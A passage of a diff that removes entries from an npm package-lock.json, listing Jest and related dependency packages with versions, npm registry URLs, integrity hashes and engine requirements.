"dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "deprecated": "This module is not supported, and leaks memory. Do not use it. Check out lru-cache if you want a good and tested way to coalesce async requests by a key value, which is much more comprehensive and powerful.", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "dependencies": { - "hasown": "^2.0.2" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "dependencies": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-instrument/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, - "node_modules/jake": { - "version": "10.9.2", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", - "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", - "dev": true, - "dependencies": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - }, - "bin": { - "jake": "bin/cli.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": 